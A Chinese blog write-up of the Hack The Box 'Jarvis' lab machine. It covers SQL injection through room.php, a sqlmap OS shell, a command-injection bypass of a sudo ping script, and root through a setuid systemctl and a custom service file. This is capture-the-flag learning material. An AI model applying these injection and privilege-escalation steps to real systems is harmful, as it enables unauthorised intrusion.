靶机渗透_hackthebox__jarvis -7

最新推荐文章于 2023-05-23 21:32:22 发布
最新推荐文章于 2023-05-23 21:32:22 发布
阅读量570 收藏
点赞数
分类专栏: 靶机渗透_hackthebox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34717555/article/details/103019119
版权

目标IP:10.10.10.143

Nmap scan report for supersecurehotel.htb (10.10.10.143)
Host is up (0.28s latency).
Not shown: 939 closed ports, 58 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 03:f3:4e:22:36:3e:3b:81:30:79:ed:49:67:65:16:67 (RSA)
|   256 25:d8:08:a8:4d:6d:e8:d2:f8:43:4a:2c:20:c8:5a:f6 (ECDSA)
|_  256 77:d4:ae:1f:b0:be:15:1f:f8:cd:c8:15:3a:c3:69:e1 (ED25519)
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Stark Hotel
8000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.13)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.13
|_http-title: Directory listing for /
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 278.00 seconds

22,80,8000端口,其中8000端口第二天访问的时候就给关闭了一个目录遍历的漏洞

所以重点都在80端口上目录爆破有几个url存在sql注入

另外有一个phpmyadmin 4.8.0

http://10.10.10.143/room.php?cod=-3%20union%20select%201,version(),user(),data
base(),5,6,7
2345
10.1.37-MariaDB-0+deb9u1
DBadmin@localhost
hotel

通过sql注入获得的一些信息

第一次访问8000端口时也拿到了一些文件 查看了一个文件 存在任意文件读取

<?php
error_reporting(0);
if($_POST['getfile']){
if(file_get_contents($_POST['getfile'])){
echo '<h4 style="color:black;">'.htmlspecialchars(file_get_contents($_POST['ge
tfile'])).'</h4>';
}
else{
echo '<h2 style="color:red">Nothing to show</h2>';
}
}
else{
header("Location:/index.php");}
?>

没有得到user.txt 那个文件应该有权限设置

因为注入的时候用户是DBadmin@localhost

所以尝试了一下sqlmap --os-shell

获得了www-data:shell

lrwxrwxrwx 1 root   root      9 Mar  4 11:11 .bash_history -> /dev/null
-rw-r--r-- 1 pepper pepper  220 Mar  2 08:54 .bash_logout
-rw-r--r-- 1 pepper pepper 3526 Mar  2 08:54 .bashrc
drwxr-xr-x 2 pepper pepper 4096 Mar  2 10:15 .nano
-rw-r--r-- 1 pepper pepper  675 Mar  2 08:54 .profile
drwxr-xr-x 3 pepper pepper 4096 Mar  4 11:14 Web
-r--r----- 1 root   pepper   33 Mar  5 07:11 user.txt

 看到/home/下面用户的目录权限爱你无法读取所以之后应该是横向提权获得pepper 用户权限

sudo -l 

Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/
bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py

不需要密码运行的simpler.py文件 用户是pepper 

#!/usr/bin/env python3
from datetime import datetime
import sys
import os
from os import listdir
import re

def show_help():
    message='''
********************************************************
* Simpler   -   A simple simplifier ;)                 *
* Version 1.0                                          *
********************************************************
Usage:  python3 simpler.py [options]

Options:
    -h/--help   : This help
    -s          : Statistics
    -l          : List the attackers IP
    -p          : ping an attacker IP
    '''
    print(message)

def show_header():
    print('''***********************************************
     _                 _                       
 ___(_)_ __ ___  _ __ | | ___ _ __ _ __  _   _ 
/ __| | '_ ` _ \| '_ \| |/ _ \ '__| '_ \| | | |
\__ \ | | | | | | |_) | |  __/ |_ | |_) | |_| |
|___/_|_| |_| |_| .__/|_|\___|_(_)| .__/ \__, |
                |_|               |_|    |___/ 
                                @ironhackers.es
                                
***********************************************
''')

def show_statistics():
    path = '/home/pepper/Web/Logs/'
    print('Statistics\n-----------')
    listed_files = listdir(path)
    count = len(listed_files)
    print('Number of Attackers: ' + str(count))
    level_1 = 0
    dat = datetime(1, 1, 1)
    ip_list = []
    reks = []
    ip = ''
    req = ''
    rek = ''
    for i in listed_files:
        f = open(path + i, 'r')
        lines = f.readlines()
        level2, rek = get_max_level(lines)
        fecha, requ = date_to_num(lines)
        ip = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]
        if fecha > dat:
            dat = fecha
            req = requ
            ip2 = i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3]
        if int(level2) > int(level_1):
            level_1 = level2
            ip_list = [ip]
            reks=[rek]
        elif int(level2) == int(level_1):
            ip_list.append(ip)
            reks.append(rek)
        f.close()
	
    print('Most Risky:')
    if len(ip_list) > 1:
        print('More than 1 ip found')
    cont = 0
    for i in ip_list:
        print('    ' + i + ' - Attack Level : ' + level_1 + ' Request: ' + reks[cont])
        cont = cont + 1
	
    print('Most Recent: ' + ip2 + ' --&gt; ' + str(dat) + ' ' + req)
	
def list_ip():
    print('Attackers\n-----------')
    path = '/home/pepper/Web/Logs/'
    listed_files = listdir(path)
    for i in listed_files:
        f = open(path + i,'r')
        lines = f.readlines()
        level,req = get_max_level(lines)
        print(i.split('.')[0] + '.' + i.split('.')[1] + '.' + i.split('.')[2] + '.' + i.split('.')[3] + ' - Attack Level : ' + level)
        f.close()

def date_to_num(lines):
    dat = datetime(1,1,1)
    ip = ''
    req=''
    for i in lines:
        if 'Level' in i:
            fecha=(i.split(' ')[6] + ' ' + i.split(' ')[7]).split('\n')[0]
            regex = '(\d+)-(.*)-(\d+)(.*)'
            logEx=re.match(regex, fecha).groups()
            mes = to_dict(logEx[1])
            fecha = logEx[0] + '-' + mes + '-' + logEx[2] + ' ' + logEx[3]
            fecha = datetime.strptime(fecha, '%Y-%m-%d %H:%M:%S')
            if fecha > dat:
                dat = fecha
                req = i.split(' ')[8] + ' ' + i.split(' ')[9] + ' ' + i.split(' ')[10]
    return dat, req
			
def to_dict(name):
    month_dict = {'Jan':'01','Feb':'02','Mar':'03','Apr':'04', 'May':'05', 'Jun':'06','Jul':'07','Aug':'08','Sep':'09','Oct':'10','Nov':'11','Dec':'12'}
    return month_dict[name]
	
def get_max_level(lines):
    level=0
    for j in lines:
        if 'Level' in j:
            if int(j.split(' ')[4]) > int(level):
                level = j.split(' ')[4]
                req=j.split(' ')[8] + ' ' + j.split(' ')[9] + ' ' + j.split(' ')[10]
    return level, req
	
def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

if __name__ == '__main__':
    show_header()
    if len(sys.argv) != 2:
        show_help()
        exit()
    if sys.argv[1] == '-h' or sys.argv[1] == '--help':
        show_help()
        exit()
    elif sys.argv[1] == '-s':
        show_statistics()
        exit()
    elif sys.argv[1] == '-l':
        list_ip()
        exit()
    elif sys.argv[1] == '-p':
        exec_ping()
        exit()
    else:
        show_help()
        exit()
#
sys.exit()

这个文件中的重点有这个函数

def exec_ping():
    forbidden = ['&', ';', '-', '`', '||', '|']
    command = input('Enter an IP: ')
    for i in forbidden:
        if i in command:
            print('Got you')
            exit()
    os.system('ping ' + command)

执行ping命令是通过调用 os.system()而且command 命令有一个白名单限制

forbidden=['&',' ; ', ' -', '`', '||', '|']

常用的命令注入用到的都给禁用调用了不过有一个$内联注入

详细另一篇有一个在学习这个靶机时关于bash 命令这注入的使用这里不多介绍

sudo -u pepper ./simpler.py -p ${IP} $(eval_command)

拿到用户pepper 

之后上传Linenum脚本 获得系统详细信息

枚举信息中有一个有意思的服务

-rwsr-x--- 1 root pepper 174520 Feb 17 03:22 /bin/systemctl

在linux中通常使用这个命令对服务进行操作 常用于开启或者关闭,重启等是一个systemd工具负责控制systemd系统和服务管理器

而systemd 时一个系统管理守护进程,工具和库的集合

systemctl 开启 开启 重启服务
systemctl start service_name
systemctl stop service_name
systemctl restart service_name
linux下创建自定义服务

自定义服务脚本以service为后缀

文件存放于 /lib/systemd/system中

脚本分为三个部分

[Unit] [Service][Install]

Unit

         表明该服务的描述,类型描述,例如A单元需要在B单元启动之后在启动

可以通过Unit 下面的Requires、After、Before、Wants来调整

Requires=B 
After=B
设置表明A的启动依赖于B 在B启动之后启动 自己

 

Service

Type=forking 后台运行模式
PIDFile=path 存放PID文件的位置
ExecStart=/bin/echo XXX 服务运行的具体执行命令
ExecReload=/bin/echo XXX 服务重启的执行命令
ExecStop=/bin/echo XXX 服务停止的执行命令
 

Service 的启动方式。在service段中启动方式由
Type指定。
这里并不是很详细所以可以查看相关文章

创建一个自定义服务文件

[Unit]
Description=RS

[Service]
ExecStart=/home/pepper/shell.sh

[Install]
WantedBy=default.target

但是默认的路径并没有编辑权限

/usr/lib/systemd/system   # 系统服务,开机不需要登录就能运行的程序(相当于开
自启)

/usr/lib/systemd/user       # 用户服务,需要登录后才能运行的程序

这两个目录在靶机中需要root才可以编辑之后检查了systemctl 命令 
可以使用system enable path_service 
会创建服务的链接到需要的目录中
 

Created symlink /etc/systemd/system/default.target.wants/root.service → /home/user/kalitool/hackthebox/jarvis/root.service.

Created symlink /etc/systemd/system/root.service → /home/user/kalitool/hackth
ebox/jarvis/root.service.

之后就是正常的开启服务即可 systemctl start root

获得root.txt 拿到权限

河里一只虾
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackmyvm System 靶机练习(最玄学的拿root经历)
Bu2n的博客
04-16 667
主机发现端口扫描漏洞挖掘权限提升 主机发现 端口扫描 漏洞挖掘 访问web,发现是一个登录表单 打开burpsuite,抓包分析,发现请求体是xml格式,立马想到XXE 发送到Repeater模块进行测试,发现email那个位置可以利用,因为他在页面上有回显 我在请求体的XML引用了外部实体,结果发现程序启用了外部实体,也就是说这里真有XXE漏洞 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE ANY [ <!E.
Hack the box -- 靶机渗透测试(TIER2)
wjishuxiaobai的博客
06-25 1632
本文针对Hack the box 靶机TIER2渗透过程进行记录。开启在线靶机靶机IP为10.129.88.20。端口扫描 扫描命令 sudo nmap -sC -sV 10.129.88.20, 发现1443端口开启了smb服务,所以尝试使用smbclient连接。smbclient连接 命令为:smbclient -N -L 10.129.88.20(-N表示无密码登录,-L可以查看服务器上可用服务) 通过查找发现在backups目录下存在一个配置文件prod.dtsConfig,将其下载本地进
Hack The Box真实靶机环境搭建教程
大河之犬的博客
05-23 1967
应该是连接VPN走的端口,既然我们是在中国,还是选择UDP这种无连接的协议比较好。然后就可以下载VPN配置文件了。接下来,这里有欧洲和美国两个地区,每个地区只有一个服务节点,选择自己的VPN对应的节点。
Hack The Box】linux练习-- Jarvis
人间体佐菲的博客
11-21 337
Hack The Box】linux练习-- Jarvis
Hack The Box 系列域渗透靶机Multimaster
二狗的博客
02-03 1322
本小白最近在学域渗透,决定把Hack The Box的Active Directory 101系列域渗透靶机打完,并详细记录当中用到的工具、知识点及其背后的原理。本篇文章是该系列的第九篇,靶机名字为Multimaster,这是一台疯狂难度的靶机
Hack the box的Easy难度比较有价值的靶机.rar
11-04
"Hack the Box"(HTB)是一个在线平台,提供各种虚拟靶机,让安全专家和爱好者通过模拟真实世界的攻击场景来提升自己的技能。这个“Easy”难度级别的靶机是为初学者设计的,旨在帮助他们入门渗透测试的基础知识。 ...
HackTheBox靶机系列之困难Reel
04-09
HackTheBox靶机系列之困难Reel 本篇文章主要介绍了Reel靶机的整个利用过程,从侦察到提权,涵盖了渗透测试、漏洞利用、信息收集等多个方面的知识点。 侦察阶段 在Reel靶机中,我们首先进行了侦察,扫描了21、22、...
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
hack_the_box:渗透测试学习之路
03-12
【标题】"hack_the_box:渗透测试学习之路"揭示了一个以黑客挑战平台"Hack The Box"为主题的深入学习之旅。这个平台让网络安全爱好者和专业人士通过模拟真实世界的渗透测试场景来提升自己的技能。渗透测试,又称白帽...
hack学习资料.zip
07-25
分享一套学习资料,里面所包含了基本工具、实验环境、信息收集、扫描以及Metasploit之类的教程和资源或者在线网站等等。
Hack The Box 系列域渗透靶机Cascade
FreeBuf_的博客
12-09 770
本小白最近在学域渗透,决定把Hack The Box的Active Directory 101 系列域渗透靶机打完,并详细记录当中用到的工具、知识点及其背后的原理。本篇文章是该系列的第八篇,靶机名字为Cascade。
HACKME:1靶机
JKding123的博客
10-22 909
HACKME:1 靶机地址 https://www.vulnhub.com/entry/hackme-1,330/ 靶机IP:192.168.3.142 kaliIP:192.168.3.133 主机发现 root@kali:~# arp-scan -l 端口扫描 开放了80、22端口 目录扫描 root@kali:~/dirsearch# python3 dirsearch.py -u http://192.168.3.142/ -e * 依次访问试试 http://192.168.3.142/lo
Hack the box -- 靶机渗透测试(TIER0)
wjishuxiaobai的博客
06-21 749
本文针对Hack the box 靶机渗透过程进行记录。开启在线靶机靶机IP为10.129.10.113。 首先使用Nmap进行端口扫描,扫描命令为nmap -v -sV -sC 10.129.50.113。 发现其开放了23端口的telnet服务,即可以提供远程登陆。所以我们尝试使用telnet连接目标主机。 不出所料需要密码进行登陆。 猜测密码,尝试登陆 使用常见的密码如admin、administrator、root等,发现输入root成功登陆。 查找Flag 总结 至此,靶机Meow已成功攻破。
HTB-oscplike-Networked+Jarvis+Legacy
m0_53302733的博客
04-03 252
HTB-oscplike-Networked+Jarvis+Legacy Networked easy难度的networked 靶机IP 10.10.10.146 sudo nmap -sC -sV -A -p- -Pn --min-rate=5000 10.10.10.146 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) 44
hacknos靶机-----1
ppbgi的博客
05-19 115
进行虚拟机的安装 参考文档:https://www.w3xue.com/exp/article/20212/69978.html 接下来开始操作 一、利用kali自带的nmap进行ip的扫描 在进行开放端口的扫描: 在本地的浏览器进行访问,成功! 接下来进行目录的扫描: 进行敏感文件的查看,得到了drupal的版本,然后利用msf进行操作: 拿到shell之后,开始进行提权; 生成密码,在kali本地进行下载: 然后在靶机的操作界面中输入: python3 -c 'impo.
No.165-HackTheBox-Linux-Jarvis-Walkthrough渗透学习
qq_34801745的博客
07-18 256
** HackTheBox-Linux-Jarvis-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/194 靶机难度:中级(4.7/10) 靶机发布日期:2019年9月9日 靶机描述: Jarvis is a medium difficulty Linux box running a web server, which has DoS and brute force protection enabled. A page
Hackthebox入门
热门推荐
DTSknanLP的博客
02-28 2万+
Hackthebox-Paper
HackInOS靶机渗透writeup
Lee
08-13 1031
HackInOS靶机渗透writeup 0x00准备测试环境 导入下载好的HackInOS.ova文件后,将网络设置成桥接模式,并使用DHCP分配IP。 成功后打开的靶机图如下 0x01渗透过程 使用nmap扫描确定目标机器IP nmap -sn 16.16.16.0/24 //确定目标机器IP为16.16.16.156,并发现8000端口提供web服务 使用浏览器插件header editor将localhost替换成16.16.16.156即可正常打开页面。 通过fuzzing遍历目
hack the box three
最新发布
07-28
回答: 根据提供的引用内容,我了解到"Hack The Box"是一个在线平台,提供了一系列的虚拟机供用户进行渗透测试和漏洞利用的训练。根据引用\[1\]中的信息,可能涉及到nmap扫描、访问靶机地址、查看/etc/hosts、使用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值